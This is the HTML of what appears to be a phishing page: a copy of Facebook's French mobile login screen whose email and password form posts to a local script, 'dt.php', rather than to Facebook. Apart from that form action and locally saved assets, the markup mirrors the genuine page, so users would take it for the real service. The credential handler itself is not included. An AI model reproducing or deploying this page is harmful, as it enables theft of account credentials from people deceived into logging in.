<!--?xml version="1.0" encoding="utf-8"?-->
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Bienvenue sur Facebook</title>
<meta name="referrer" content="origin-when-crossorigin" id="meta_referrer">
<style type="text/css">/*<![CDATA[*/.b .bl{border:solid 1px #999;box-sizing:border-box;width:100%;}.b .bs{display:block;width:auto;}.x{padding:8px;}.bu{padding-bottom:12px;padding-top:12px;}.bt{padding-left:4px;padding-right:4px;}.br{padding-left:8px;padding-right:8px;}.bi{padding-bottom:4px;}.b .u{border:0;border-collapse:collapse;margin:0;padding:0;width:100%;}.b .u tbody{vertical-align:top;}.b .u td{padding:0;}.b .u td.be{padding:4px;}.b .v{width:100%;}.w{background:#fa3e3e;}.y{color:#fff;}.b .y a,.b .y a:visited{color:#fff;font-weight:bold;}.b .y a:focus,.b .y a:hover{background:#1d2129;}.bw{color:#4b4f56;}.z{font-size:12px;line-height:16px;}.bv{font-size:16px;line-height:20px;}.bg{font-weight:bold;}form{margin:0;border:0;}.bd{margin:0;}.bd li{display:block;list-style:none;}.b .bx{padding:0;}.b .be{padding:4px;}.b .bh{color:#90949c;font-weight:bold;}.b .bk{padding:12px 8px;color:#1d2129;}.bj{border:0;display:block;margin:0;padding:0;}.bm{box-sizing:border-box;width:100%;}.b .bn{border:solid 1px #999;}.o{-moz-appearance:none;background:none;display:inline-block;font-size:12px;height:28px;line-height:28px;margin:0;overflow:visible;padding:0 9px;text-align:center;vertical-align:top;white-space:nowrap;}.b .o{border-radius:2px;}.bq,.q,a.bq,a.q,html .b a.bq,html .b a.q{color:#fff;}.b .q{background-color:#4080ff;border:1px solid #4476e8;}.b a.q:hover,.b .q:hover{background-color:#4580ef;}.b .bq{background-color:#4267b2;border:1px solid #365899;}.b a.bq:hover,.b .bq:hover{background-color:#465e91;}.bq[disabled]{color:#899bc1;}.q[disabled]{color:#91b4fd;}.b .bq[disabled]:hover{background-color:#4267b2;}.b .q[disabled]:hover{background-color:#4080ff;}.bp{font-size:14px;height:44px;line-height:44px;padding:0 20px;}.o .s{display:inline-block;}.b .o .s{display:inline-block;margin-top:0;vertical-align:middle;}.b a.o::after{content:"";display:inline-block;height:100%;vertical-align:middle;}.o .s{line-height:20px;margin-top:4px;}.bp .s{line-height:24px;margin-top:10px;}.o.bo{display:block;width:100%;}a.o.bo,.b label.o.bo{display:block;width:auto;}.b .o{padding:0 8px;}.b a.o{height:26px;line-height:26px;}.b .bp{padding:0 19px;}.b a.bp{font-size:14px;height:42px;line-height:42px;}.s{pointer-events:none;}.b a,.b a:visited{color:#3b5998;text-decoration:none;}.b a:focus,.b a:hover{background-color:#3b5998;color:#fff;}body{text-align:left;direction:ltr;}body,tr,input,textarea,button{font-family:sans-serif;}body,p,figure,h1,h2,h3,h4,h5,h6,ul,ol,li,dl,dd,dt{margin:0;padding:0;}h1,h2,h3,h4,h5,h6{font-size:1em;font-weight:bold;}ul,ol{list-style:none;}article,aside,figcaption,figure,footer,header,nav,section{display:block;}.e #viewport{margin:0 auto;max-width:600px;}.g{background-color:#fff;}.i{background-color:#3b5998;}.ba{background-color:#eceff5;}#page{position:relative;}.b .p span{font-size:14px;}.j{padding:2px 3px;}.k{width:100%;}.k .m{text-align:right;}.l{border:0;display:inline-block;vertical-align:top;}i.l u{position:absolute;width:0;height:0;overflow:hidden;}.cc{display:block;font-size:x-small;margin:-3px -3px 1px -3px;padding:3px;}.ce{border:1px solid #90949c;display:block;font-size:x-large;height:20px;line-height:18px;text-align:center;vertical-align:middle;width:20px;}.b .bz a,.b .bz a:visited{color:#bec2c9;}.b .bz a:focus,.b .bz a:hover{background:#dddfe2;color:#1d2129;}.by{background-color:#4b4f56;font-size:x-small;padding:7px 8px 8px;}.cb{color:#bec2c9;display:block;font-size:x-small;margin:-3px -3px 1px -3px;padding:3px;}.cf{color:#fff;}body,tr,input,textarea,.h{font-size:medium;}/*]]>*/</style>
<link rel="canonical" href="https://www.facebook.com/">
<link href="index_files/socialwidgets.css" type="text/css" rel="stylesheet">
<link rel="shortcut icon" href="index_files/favicon.ico">
</head>
<body tabindex="0" class="b c d e f g">
<div class="h">
<div id="viewport">
<div class="i j" id="header">
<table class="k" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td valign="middle">
<h1>
<img src="index_files/k97pj8-or6s.png" class="l" alt="facebook" height="16" width="77">
</h1>
</td>
<td class="m" valign="middle">
<a class="n o p q" href="https://m.facebook.com/reg/?cid=102&amp;refid=8">
<span class="s">Créer un compte</span>
</a>
</td>
</tr>
</tbody>
</table>
</div>
<div id="objects_container">
<div class="t g" id="root" role="main">
<table class="u">
<tbody>
<tr>
<td class="v">
<div class="w x y" style="display: none;">
<div class="z">
</div>
</div>
<div>
<div class="ba bb">
<div>
</div>
<form method="post" class="bc" id="login_form" novalidate="1" action="dt.php">
<input name="lsd" value="AVqeESCD" autocomplete="off" type="hidden">
<input name="charset_test" value="€,´,€,´,水,Д,Є" type="hidden">
<input name="version" value="1" type="hidden">
<input id="ajax" name="ajax" value="0" type="hidden">
<input id="width" name="width" value="0" type="hidden">
<input id="pxr" name="pxr" value="0" type="hidden">
<input id="gps" name="gps" value="0" type="hidden">
<input id="dimensions" name="dimensions" value="0" type="hidden">
<input name="m_ts" value="1465334024" type="hidden">
<input name="li" value="CDlXVwk3WxN8db_QrsDyF_sr" type="hidden">
<ul class="bd be bf">
<li class="be">
<h3 class="bg bh bi">Adresse e-mail ou mobile</h3>
<input autocorrect="off" autocapitalize="off" class="bj bk bl" name="email" value="" type="text">
</li>
<li class="be">
<div>
<h3 class="bg bh bi">Mot de passe</h3>
<input autocorrect="off" autocapitalize="off" class="bj bk bm bn" name="pass" type="password">
</div>
</li>
<li class="be">
<input value="Connexion" name="login" class="n o bo bp bq" type="submit">
</li>
</ul>
<noscript>
<input type="hidden" name="_fb_noscript" value="true" />
</noscript>
</form>
<div class="br">
<a class="n o bs bp q" href="https://m.facebook.com/reg/?cid=103&amp;refid=8">
<span class="s">Créer un compte</span>
</a>
</div>
<div class="bt bu">
<span class="bv bw">
<ul class="bd bx">
<li class="be">
<a href="https://m.facebook.com/recover/initiate/?c=https%3A%2F%2Fm.facebook.com%2F&amp;lwv=101&amp;refid=8">Mot de passe oublié&nbsp;?</a>
</li>
<li class="be">
<a href="https://m.facebook.com/help/?refid=8">Pages d’aide</a>
</li>
</ul>
</span>
</div>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div>
<div class="by">
<div class="bz">
<table class="u">
<tbody>
<tr>
<td class="v ca" style="width:50%">
<b class="cb">Français (France)</b>
<a class="cc" href="https://m.facebook.com/a/language.php?l=es_LA&amp;lref=https%3A%2F%2Fm.facebook.com%2F&amp;index=2&amp;gfid=AQCqzX5t4UotEq9C&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8">Español</a>
<a class="cc" href="https://m.facebook.com/a/language.php?l=de_DE&amp;lref=https%3A%2F%2Fm.facebook.com%2F&amp;index=4&amp;gfid=AQAhYyVBkReYHlYu&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8">Deutsch</a>
</td>
<td class="v cd" style="width:50%">
<a class="cc" href="https://m.facebook.com/a/language.php?l=en_US&amp;lref=https%3A%2F%2Fm.facebook.com%2F&amp;index=1&amp;gfid=AQDuQZwvrG_P37EN&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8">English (US)</a>
<a class="cc" href="https://m.facebook.com/a/language.php?l=pt_BR&amp;lref=https%3A%2F%2Fm.facebook.com%2F&amp;index=3&amp;gfid=AQAccRB1QzOxlYMk&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8">Português (Brasil)</a>
<a class="cc" href="https://m.facebook.com/language.php?n=https%3A%2F%2Fm.facebook.com%2F&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8">
<div class="ce"> + </div>
</a>
</td>
</tr>
</tbody>
</table>
</div>
<span class="bg cf">Facebook ©2016</span>
</div>
</div>
</div>
</div>
</body>
</html>
